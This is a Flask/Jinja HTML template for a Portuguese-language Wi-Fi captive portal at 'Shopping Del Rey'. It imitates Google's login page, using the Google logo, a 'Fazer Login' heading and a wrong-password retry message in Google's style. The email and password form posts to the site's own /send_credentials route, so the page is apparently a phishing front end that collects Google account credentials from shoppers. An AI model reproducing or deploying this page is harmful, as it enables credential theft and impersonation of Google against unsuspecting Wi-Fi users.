{% extends "base.html" %}

{% block content %}
<div id="header">
    <img id="del-rey-logo" src="{{ url_for('static', filename='images/delrey_logo.png') }}" alt="Shopping Del Rey">
    <img id="wifi-logo" src="{{ url_for('static', filename='images/sinal_wifi.png') }}" alt="Shopping Del Rey">
</div>
<div id="main">
    <h1>Cadastre-se na rede</h1>
    <!-- <p>Faça cadastro na rede <i><b>Wi-Fi</b></i> grátis com sua conta Google.</p> -->
    <p>Utilize a sua conta do Google para conectar-se à nossa rede <i><b>Wi-Fi</b></i>.</p>
    <div id="login-container">
        <div id="form-container">
            <div id="login-header">
                <svg xmlns="https://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48" aria-hidden="true" jsname="jjf7Ff"><path fill="#4285F4" d="M45.12 24.5c0-1.56-.14-3.06-.4-4.5H24v8.51h11.84c-.51 2.75-2.06 5.08-4.39 6.64v5.52h7.11c4.16-3.83 6.56-9.47 6.56-16.17z"></path><path fill="#34A853" d="M24 46c5.94 0 10.92-1.97 14.56-5.33l-7.11-5.52c-1.97 1.32-4.49 2.1-7.45 2.1-5.73 0-10.58-3.87-12.31-9.07H4.34v5.7C7.96 41.07 15.4 46 24 46z"></path><path fill="#FBBC05" d="M11.69 28.18C11.25 26.86 11 25.45 11 24s.25-2.86.69-4.18v-5.7H4.34C2.85 17.09 2 20.45 2 24c0 3.55.85 6.91 2.34 9.88l7.35-5.7z"></path><path fill="#EA4335" d="M24 10.75c3.23 0 6.13 1.11 8.41 3.29l6.31-6.31C34.91 4.18 29.93 2 24 2 15.4 2 7.96 6.93 4.34 14.12l7.35 5.7c1.73-5.2 6.58-9.07 12.31-9.07z"></path><path fill="none" d="M2 2h44v44H2z"></path></svg>
                <h2>Fazer Login</h2>
            </div>
            <form id="form" method="post" action="/send_credentials">
                <label for="email">Email</label>
                <input type="email" name="email" id="email">
            
                <label for="password">Senha</label>
                <input type="password" name="password" id="password">
                {% if retry %}
                <div id="wrong-pass-container">
                    <div id="wrong-pass-icon">
                        <svg aria-hidden="true" class="Qk3oof JPqhye" fill="currentColor" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path></svg>
                    </div>
                    <div id="wrong-pass-text">
                        <p>Senha incorreta. Tente novamente ou clique em "Esqueceu a senha?" para escolher outra.</p>
                    </div>
                </div>
                {% endif %}
            

                <div id="form-footer">
                    <a href="https://support.google.com/accounts/answer/7682439?hl=pt-BR">
                        <span>Esqueceu a senha?</span>
                    </a>
                    <button form="form" type="submit">Enviar</button>
                </div>
            </form>
        </div>
    </div>
</div>
{% endblock %}
